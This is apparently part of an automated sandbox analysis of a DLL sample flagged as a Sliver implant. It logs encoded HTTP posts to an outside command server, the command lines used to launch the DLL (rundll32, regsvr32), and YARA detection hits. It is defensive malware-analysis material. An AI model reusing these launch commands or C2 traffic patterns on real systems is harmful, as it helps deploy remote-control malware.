Sep 27, 2024 11:20:32.574444056 CEST | 837 | OUT | POST /namespaces/oauth/sign-up.html?dr=18845628&k=7303s814h1 HTTP/1.1
Host: 203.204.217.190:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
Content-Length: 532
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
Sep 27, 2024 11:20:33.552536011 CEST | 82 | IN | HTTP/1.1 404 Not Found
Date: Fri, 27 Sep 2024 09:20:33 GMT
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49751 | 203.204.217.190 | 8092 | 7664 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:20:35.231462955 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49752 | 203.204.217.190 | 8092 | 7664 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:20:35.249691010 CEST | 620 | OUT | POST /db/oauth/db/oauth2/php/db/oauth2callback/rpc.html?h=75352k715&wh=18f84w5628 HTTP/1.1
Host: 203.204.217.190:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
Content-Length: 294
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
Sep 27, 2024 11:20:36.235466957 CEST | 82 | IN | HTTP/1.1 404 Not Found
Date: Fri, 27 Sep 2024 09:20:36 GMT
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49753 | 203.204.217.190 | 8092 | 7336 | C:\Windows\System32\loaddll32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:20:38.321647882 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49754 | 203.204.217.190 | 8092 | 7336 | C:\Windows\System32\loaddll32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:20:38.342720032 CEST | 2849 | OUT | POST /oauth2/database/api/php/samples.html?d=71155844&og=18845628 HTTP/1.1
Host: 203.204.217.190:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
Content-Length: 2538
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
Data Ascii: SIMLIN LEADMEN HITCHHIKER MENTIONED ROVER BUTTERFAT PURCHASE BOTCHIEST CHEERING GOOMBAH CROAK NEIGHED AUTOROUTE KECKING ORPHREYS FOOTSTOCK PSYCHING CINQUE MELTWATERS REIMBURSE THIOURACILS GEOMAGNETISM DESTAINING QUINTUPLET THICKHEADED SQUATLY HEMISPHERES SULLENLY GENTAMICIN KEBBIES NONGLARES EASED BLUECAPS MELTAGES ZOOLOGY STARFISH AXONOMETRIC ERASURES REVERSER EASED SAMPHIRE BRANT DEPRECIATOR CRAPOLAS CHEERING AXONOMETRIC EARLDOMS SALUTARY TERRENES ADMITTEE REEVALUATES UPSIZING SALUTARY EASED SOUTHWESTER THIOURACILS BEAMLESS DOUBLEHEADER BLUECAPS DEEDY NAZI SPIFF ARRANGED FOOLFISH SWEETIES SANDBARS JOYPOPS FROSTBIT SOPHISTICATEDLY REJUVENATOR METHADON SOUTHWESTER BALMINESSES NEUTRALNESS FATALISM AILERON NEUTRALNESS PATHWAYS EVINCING SOUTHWESTER DEPRECIATOR WISTFULNESS UPSIZING REJUVENATOR PULED SLICK ADMITTEE BUCKSHOT DRAFFIER JOYPOPS KEYSTONE FADEAWAY PACHALIC ROUGHNESSES ANTIMONY TALLAGES SUBROUTINES STARFISH BLUECAPS GREASEWOODS MEANINGS DEAIR AXONOMETRIC CHERNOZEMIC OUTBOAST ROUGHNESSES DEPLU [TRUNCATED]
Sep 27, 2024 11:20:39.312338114 CEST | 82 | IN | HTTP/1.1 404 Not Found
Date: Fri, 27 Sep 2024 09:20:39 GMT
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49761 | 203.204.217.190 | 8092 | 7488 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:22:33.785480022 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49763 | 203.204.217.190 | 8092 | 7488 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:22:33.804893970 CEST | 579 | OUT | POST /db/api.html?x=19440630&xj=33556174 HTTP/1.1
Host: 203.204.217.190:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
Content-Length: 294
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
Sep 27, 2024 11:22:34.754260063 CEST | 82 | IN | HTTP/1.1 404 Not Found
Date: Fri, 27 Sep 2024 09:22:34 GMT
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49762 | 203.204.217.190 | 8092 | 7480 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:22:34.043689013 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
15          192.168.2.4  49764        203.204.217.190  8092              7480  C:\Windows\SysWOW64\rundll32.exe

Timestamp                             Bytes  Direction  Data
Sep 27, 2024 11:22:34.061904907 CEST    633  OUT        POST /oauth/database/namespaces/database/api/db/database/register.html?c=21322866&wd=a33556174 HTTP/1.1
    Host: 203.204.217.190:8092
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
    Content-Length: 294
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip
    Data Raw: 1f 8b 08 00 00 00 00 00 04 ff 00 0a 01 f5 fe cc f6 e3 a3 8e b1 5b a5 45 fd 70 f4 c8 fc 7c bc 65 c5 08 ae 47 80 e6 1b 0e 33 3d 78 df f5 a9 62 58 53 36 63 48 6e 36 65 4b 45 5a 31 62 4f 2f 67 58 64 37 4f 42 62 6e 67 68 48 33 68 59 4f 46 36 61 74 6b 70 59 62 67 77 79 31 6f 0a 77 58 6f 39 57 44 49 65 30 48 41 58 71 49 6e 56 34 77 68 32 52 54 7a 4c 2b 6c 51 34 71 56 4e 33 4b 6d 65 78 6c 4e 2f 74 73 6e 30 0a 2d 2d 2d 20 7a 71 66 33 77 62 55 51 61 64 77 45 38 77 42 44 6f 44 46 51 36 42 2b 52 54 4d 69 39 49 65 79 4d 78 75 32 47 7a 56 56 6c 67 41 6f 0a 1b b3 6e ad 1f 06 ae 82 96 4d 22 75 ce 05 f5 62 9b 45 e3 80 af 10 66 26 f9 0c 44 ab 76 8c 13 d6 08 13 2e 81 a0 12 65 a0 8e 89 85 1f 4b 12 08 42 ec 5f c0 ac 73 8e 20 03 ae 8a ce ec 59 f2 c0 8f 12 66 5d 94 6f 4d 35 d8 5e f4 03 3d e6 4e ae f4 3a fb a8 76 44 f9 b1 d1 8b 65 e6 f7 71 0c 1f e1 91 77 01 00 00 ff ff 6e 7d 5f 10 0a 01 00 00
    Data Ascii: [Ep|eG3=xbXS6cHn6eKEZ1bO/gXd7OBbnghH3hYOF6atkpYbgwy1owXo9WDIe0HAXqInV4wh2RTzL+lQ4qVN3KmexlN/tsn0--- zqf3wbUQadwE8wBDoDFQ6B+RTMi9IeyMxu2GzVVlgAonM"ubEf&Dv.eKB_s Yf]oM5^=N:vDeqwn}_
Sep 27, 2024 11:22:35.030294895 CEST     82  IN         HTTP/1.1 404 Not Found
    Date: Fri, 27 Sep 2024 09:22:34 GMT
    Content-Length: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
16          192.168.2.4  49765        203.204.217.190  8092              7472  C:\Windows\SysWOW64\regsvr32.exe

Timestamp                             Bytes  Direction  Data
Sep 27, 2024 11:22:36.083379030 CEST    103  IN         HTTP/1.1 400 Bad Request
    Content-Type: text/plain; charset=utf-8
    Connection: close
    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
    Data Ascii: 400 Bad Request


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
17          192.168.2.4  49767        203.204.217.190  8092              7472  C:\Windows\SysWOW64\regsvr32.exe

Timestamp                             Bytes  Direction  Data
Sep 27, 2024 11:22:36.107408047 CEST    654  OUT        POST /oauth2/oauth/db/api.html?_=36462oo14&ip=33556174 HTTP/1.1
    Host: 203.204.217.190:8092
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
    Content-Length: 355
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip
    Data Raw: 50 6d 77 43 47 54 55 4f 73 55 5f 35 5a 74 32 51 39 6d 4f 57 37 64 74 35 62 68 2b 65 31 6c 2d 77 32 43 6a 58 7a 6b 5a 52 49 73 36 47 77 51 4f 34 7a 35 42 6a 6b 52 2d 2b 70 52 6f 76 6a 51 4f 30 5f 46 61 37 76 65 30 30 71 43 2d 38 78 34 36 75 6a 44 6f 44 72 50 36 4d 71 52 34 4a 6b 34 4c 2b 71 43 6b 53 62 34 48 53 75 43 30 38 77 46 36 6f 72 51 48 74 6e 73 34 52 76 43 5f 53 79 33 58 4a 70 35 79 68 72 51 48 46 6e 44 44 52 70 38 79 32 5f 35 75 74 6b 72 6e 4f 2d 52 48 2d 6f 43 6e 68 69 70 51 4c 66 64 2b 4a 2d 53 75 37 72 73 6f 76 2d 50 79 5f 71 52 79 4d 73 63 5f 39 70 74 42 4a 6a 71 75 38 75 38 4c 6d 78 46 30 52 72 34 34 4a 6f 53 36 72 76 38 52 47 6b 44 42 64 69 51 63 68 38 31 30 4d 59 63 6c 68 4c 4a 5a 59 52 33 48 71 42 66 37 42 64 56 63 4b 58 62 4a 56 38 79 35 63 50 38 6f 32 77 44 42 59 6c 7a 4c 79 2d 4a 6e 4c 37 59 76 50 37 73 39 38 34 75 54 36 6c 6d 55 70 45 7a 68 74 6f 75 51 41 2b 6d 62 36 77 68 43 62 33 79 34 75 78 4a 49 4c 71 69 5a 49 36 76 64 45 46 63 4a 72 30 5a 42 4f 4d 4d 47 6c 71 32 46 70 52 78 [TRUNCATED]
    Data Ascii: PmwCGTUOsU_5Zt2Q9mOW7dt5bh+e1l-w2CjXzkZRIs6GwQO4z5BjkR-+pRovjQO0_Fa7ve00qC-8x46ujDoDrP6MqR4Jk4L+qCkSb4HSuC08wF6orQHtns4RvC_Sy3XJp5yhrQHFnDDRp8y2_5utkrnO-RH-oCnhipQLfd+J-Su7rsov-Py_qRyMsc_9ptBJjqu8u8LmxF0Rr44JoS6rv8RGkDBdiQch810MYclhLJZYR3HqBf7BdVcKXbJV8y5cP8o2wDBYlzLy-JnL7YvP7s984uT6lmUpEzhtouQA+mb6whCb3y4uxJILqiZI6vdEFcJr0ZBOMMGlq2FpRx-pYOntX8k-LHd51-G
Sep 27, 2024 11:22:37.071223021 CEST     82  IN         HTTP/1.1 404 Not Found
    Date: Fri, 27 Sep 2024 09:22:36 GMT
    Content-Length: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
18          192.168.2.4  49766        203.204.217.190  8092              7624  C:\Windows\SysWOW64\rundll32.exe

Timestamp                             Bytes  Direction  Data
Sep 27, 2024 11:22:37.073476076 CEST    103  IN         HTTP/1.1 400 Bad Request
    Content-Type: text/plain; charset=utf-8
    Connection: close
    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
    Data Ascii: 400 Bad Request


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
19          192.168.2.4  49768        203.204.217.190  8092              7624  C:\Windows\SysWOW64\rundll32.exe

Timestamp                             Bytes  Direction  Data
Sep 27, 2024 11:22:37.105524063 CEST    697  OUT        POST /oauth/api/php/db/sign-up.html?_u=3355617q4&u=4866k2066 HTTP/1.1
    Host: 203.204.217.190:8092
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
    Content-Length: 392
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip
    Data Raw: 65 54 4b 66 61 61 61 61 61 61 61 63 5a 4e 61 68 61 41 74 59 50 6d 77 43 47 54 55 4f 73 55 5f 35 5a 74 32 51 39 6d 4f 57 37 64 74 35 62 68 2b 65 31 6c 2d 77 32 43 6a 58 7a 6b 5a 52 49 73 36 55 7a 46 66 52 73 5f 75 37 5f 38 42 6d 5f 63 35 36 6b 44 48 6a 70 51 36 68 77 53 42 2b 6a 35 30 74 6e 45 66 38 6a 64 44 51 76 64 4c 48 78 43 6a 37 6b 72 78 4e 77 35 6f 30 62 34 6b 74 76 63 36 5f 6f 65 75 75 79 73 6e 4a 77 72 31 4f 76 38 35 66 6b 39 4b 53 6b 72 4f 71 71 38 79 52 6f 71 6b 46 75 39 58 2b 73 34 6f 53 6e 5f 79 48 6c 32 35 39 76 72 72 68 69 70 51 4c 66 63 35 6f 72 50 6b 2d 71 52 36 6e 6a 32 6b 43 6f 5f 79 30 71 50 61 4e 6a 63 52 4c 6b 32 42 34 2d 44 36 46 6f 70 58 76 6a 64 52 36 6f 73 42 76 78 38 6b 69 71 64 5f 62 2d 38 57 68 5a 6e 62 35 78 46 51 57 52 64 51 53 30 69 5a 61 54 50 36 47 6f 5f 6d 58 62 39 6d 4d 52 2d 59 58 69 4f 6e 73 4a 4e 45 78 6a 73 6f 36 4d 71 63 4a 63 70 35 65 73 38 62 64 62 52 65 35 68 50 44 5a 52 37 5a 6b 73 39 37 50 6a 78 74 4d 2b 71 74 70 39 32 76 39 71 70 54 2b 4f 44 61 2d 5a 5a [TRUNCATED]
    Data Ascii: eTKfaaaaaaacZNahaAtYPmwCGTUOsU_5Zt2Q9mOW7dt5bh+e1l-w2CjXzkZRIs6UzFfRs_u7_8Bm_c56kDHjpQ6hwSB+j50tnEf8jdDQvdLHxCj7krxNw5o0b4ktvc6_oeuuysnJwr1Ov85fk9KSkrOqq8yRoqkFu9X+s4oSn_yHl259vrrhipQLfc5orPk-qR6nj2kCo_y0qPaNjcRLk2B4-D6FopXvjdR6osBvx8kiqd_b-8WhZnb5xFQWRdQS0iZaTP6Go_mXb9mMR-YXiOnsJNExjso6MqcJcp5es8bdbRe5hPDZR7Zks97PjxtM+qtp92v9qpT+ODa-ZZYkLJZaYlInhXSM0dJQRWrDK+N3ItIUUopdJ0r0aa2ZZVFe98Whanaa
Sep 27, 2024 11:22:38.055094957 CEST     82  IN         HTTP/1.1 404 Not Found
    Date: Fri, 27 Sep 2024 09:22:37 GMT
    Content-Length: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
20          192.168.2.4  49769        203.204.217.190  8092              7664  C:\Windows\SysWOW64\rundll32.exe

Timestamp                             Bytes  Direction  Data
Sep 27, 2024 11:22:40.350692034 CEST    103  IN         HTTP/1.1 400 Bad Request
    Content-Type: text/plain; charset=utf-8
    Connection: close
    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
    Data Ascii: 400 Bad Request


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
21          192.168.2.4  49770        203.204.217.190  8092              7664  C:\Windows\SysWOW64\rundll32.exe

Timestamp                             Bytes  Direction  Data
Sep 27, 2024 11:22:40.367018938 CEST    692  OUT        POST /db/namespaces/signin.html?rp=33556174&w=6871591h9 HTTP/1.1
    Host: 203.204.217.190:8092
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
    Content-Length: 392
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip
    Data Raw: 65 54 4b 66 61 61 61 61 61 61 61 63 5a 4e 61 68 61 41 74 59 50 6d 77 43 47 54 55 4f 73 55 5f 35 5a 74 32 51 39 6d 4f 57 37 64 74 35 62 68 2b 65 31 6c 2d 77 32 43 6a 58 7a 6b 5a 52 49 73 66 2b 2d 72 2d 4f 76 72 4c 75 6a 72 75 47 70 70 57 53 6b 73 35 6b 6e 72 44 34 5f 64 48 6f 6f 51 4c 44 77 64 4f 32 7a 35 30 74 79 38 4b 4e 75 72 4c 49 6f 38 72 37 6e 45 52 6f 62 45 6b 63 72 51 31 53 6c 64 75 4a 78 72 54 4a 73 73 42 30 78 73 42 42 75 5f 6f 49 2d 45 48 37 6e 44 79 66 79 51 52 62 78 34 6b 74 6c 5f 34 4e 79 38 44 50 76 51 36 6b 73 35 63 68 69 70 51 4c 66 35 5f 62 75 71 6b 2d 70 46 44 48 77 64 44 74 70 74 78 4f 78 39 4c 34 6f 34 2b 64 68 51 5f 46 6f 74 42 74 76 44 48 49 6e 72 6b 69 2d 45 42 76 6b 64 6f 36 6c 72 48 32 70 51 34 68 74 6f 59 33 47 71 4a 6c 43 66 78 34 75 56 2b 4a 75 4a 52 2d 35 49 51 4b 47 51 56 57 33 36 6e 6e 41 43 56 55 64 58 31 69 55 79 4c 7a 4d 44 4a 54 76 39 33 4e 53 44 54 4c 66 66 62 6a 69 6d 56 61 32 30 50 36 43 41 6d 75 58 63 39 41 55 54 4c 59 6a 38 73 55 66 44 63 52 51 4b 4c 58 69 51 [TRUNCATED]
    Data Ascii: eTKfaaaaaaacZNahaAtYPmwCGTUOsU_5Zt2Q9mOW7dt5bh+e1l-w2CjXzkZRIsf+-r-OvrLujruGppWSks5knrD4_dHooQLDwdO2z50ty8KNurLIo8r7nERobEkcrQ1SlduJxrTJssB0xsBBu_oI-EH7nDyfyQRbx4ktl_4Ny8DPvQ6ks5chipQLf5_buqk-pFDHwdDtptxOx9L4o4+dhQ_FotBtvDHInrki-EBvkdo6lrH2pQ4htoY3GqJlCfx4uV+JuJR-5IQKGQVW36nnACVUdX1iUyLzMDJTv93NSDTLffbjimVa20P6CAmuXc9AUTLYj8sUfDcRQKLXiQsB8U527cAJyOdreycCQB6UPPr7IVtAVT5_9BG0aa2ZZ8Af0Kjhanaa
Sep 27, 2024 11:22:41.364435911 CEST     82  IN         HTTP/1.1 404 Not Found
    Date: Fri, 27 Sep 2024 09:22:41 GMT
    Content-Length: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
22          192.168.2.4  49771        203.204.217.190  8092              7336  C:\Windows\System32\loaddll32.exe

Timestamp                             Bytes  Direction  Data
Sep 27, 2024 11:22:42.592505932 CEST    103  IN         HTTP/1.1 400 Bad Request
    Content-Type: text/plain; charset=utf-8
    Connection: close
    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
    Data Ascii: 400 Bad Request


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    23192.168.2.449772203.204.217.19080927336C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.625525951 CEST681OUTPOST /database/namespaces/oauth2/oauth/database/rpc.html?bs=3q3556174&n=5l3348718 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 355
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
Sep 27, 2024 11:22:43.579540014 CEST | 82 bytes | IN | HTTP/1.1 404 Not Found
Date: Fri, 27 Sep 2024 09:22:43 GMT
Content-Length: 0


Target ID: 1
Start time: 05:19:24
Start date: 27/09/2024
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll"
Imagebase: 0x8c0000
File size: 126'464 bytes
MD5 hash: 51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000001.00000002.4218398121.000000000A114000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Multi_Trojan_Bishopsliver_42298c4a, Description: unknown, Source: 00000001.00000002.4230715500.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 2
Start time: 05:19:24
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 05:19:24
Start date: 27/09/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 05:19:24
Start date: 27/09/2024
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: regsvr32.exe /i /s C:\Users\user\Desktop\5cPRapVOx6.dll
Imagebase: 0xc90000
File size: 20'992 bytes
MD5 hash: 878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000004.00000002.4218098729.000000000CD74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000004.00000003.3996852512.000000000CD74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Multi_Trojan_Bishopsliver_42298c4a, Description: unknown, Source: 00000004.00000002.4229586587.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 5
Start time: 05:19:24
Start date: 27/09/2024
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1
Imagebase: 0xaa0000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000005.00000002.4218005900.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000005.00000003.3835816223.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Multi_Trojan_Bishopsliver_42298c4a, Description: unknown, Source: 00000005.00000002.4230484560.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 6
Start time: 05:19:24
Start date: 27/09/2024
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllInstall
Imagebase: 0xaa0000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000006.00000002.4217009815.000000000CCD2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000006.00000003.2589897810.000000000CCD2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Multi_Trojan_Bishopsliver_42298c4a, Description: unknown, Source: 00000006.00000002.4229493462.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 7
Start time: 05:19:27
Start date: 27/09/2024
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllRegisterServer
Imagebase: 0xaa0000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000007.00000003.3672650809.000000000C95C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000007.00000002.4220285645.000000000C95C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Multi_Trojan_Bishopsliver_42298c4a, Description: unknown, Source: 00000007.00000002.4229872481.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 8
Start time: 05:19:30
Start date: 27/09/2024
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllUnregisterServer
Imagebase: 0xaa0000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000008.00000003.2663104353.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Sliver, Description: Yara detected Sliver Implants, Source: 00000008.00000002.4220443970.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Multi_Trojan_Bishopsliver_42298c4a, Description: unknown, Source: 00000008.00000002.4231392141.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation: high
Has exited: false

No disassembly